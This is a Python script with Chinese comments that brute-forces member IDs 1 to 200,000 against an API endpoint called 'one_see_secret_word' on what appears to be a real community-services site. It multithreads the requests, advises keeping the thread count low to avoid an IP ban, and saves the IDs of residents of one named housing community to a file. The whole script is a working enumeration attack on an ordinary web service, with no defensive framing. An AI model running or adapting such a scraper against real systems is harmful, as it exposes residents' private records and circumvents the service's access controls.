import json import urllib.request import concurrent.futures from datetime import datetime # 配置参数 API_URL = "https://jsh.szsentry.com/api//mine/one_see_secret_word" TARGET_VILLAGE = "兆景华庭青年社区" RANGE_START = 1 RANGE_END = 200000 MAX_THREADS = 15 # 线程数,建议不要开太大以免被封 IP OUTPUT_FILE = "found_ids.txt" def check_id(member_id): """请求单个 ID 并检查社区名称""" body = json.dumps({"member_id": member_id}).encode() req = urllib.request.Request( API_URL, data=body, headers={"Content-Type": "application/json"}, method="POST", ) try: with urllib.request.urlopen(req, timeout=5) as resp: data = json.loads(resp.read().decode("utf-8")) if data.get("status") == 200: village = data.get("data", {}).get("village_name") if village == TARGET_VILLAGE: return member_id, village except Exception: # 忽略超时、网络错误或 404 等 pass return None def main(): print(f"开始扫描 ID {RANGE_START} 到 {RANGE_END}...") print(f"目标社区: {TARGET_VILLAGE}") found_count = 0 # 使用线程池加速 with concurrent.futures.ThreadPoolExecutor(max_workers=MAX_THREADS) as executor: # 提交任务 future_to_id = {executor.submit(check_id, i): i for i in range(RANGE_START, RANGE_END + 1)} with open(OUTPUT_FILE, "a", encoding="utf-8") as f: for i, future in enumerate(concurrent.futures.as_completed(future_to_id)): result = future.result() if result: mid, vname = result found_count += 1 output_str = f"ID: {mid} | Village: {vname}\n" print(f"\n[!] 发现匹配: {output_str.strip()}") f.write(output_str) f.flush() # 确保实时写入硬盘 # 每 100 个打印一次进度 if i % 100 == 0: print(f"\r当前进度: {i}/{RANGE_END - RANGE_START + 1}", end="") print(f"\n扫描完成!共发现 {found_count} 个匹配项,结果已保存至 {OUTPUT_FILE}") if __name__ == "__main__": main()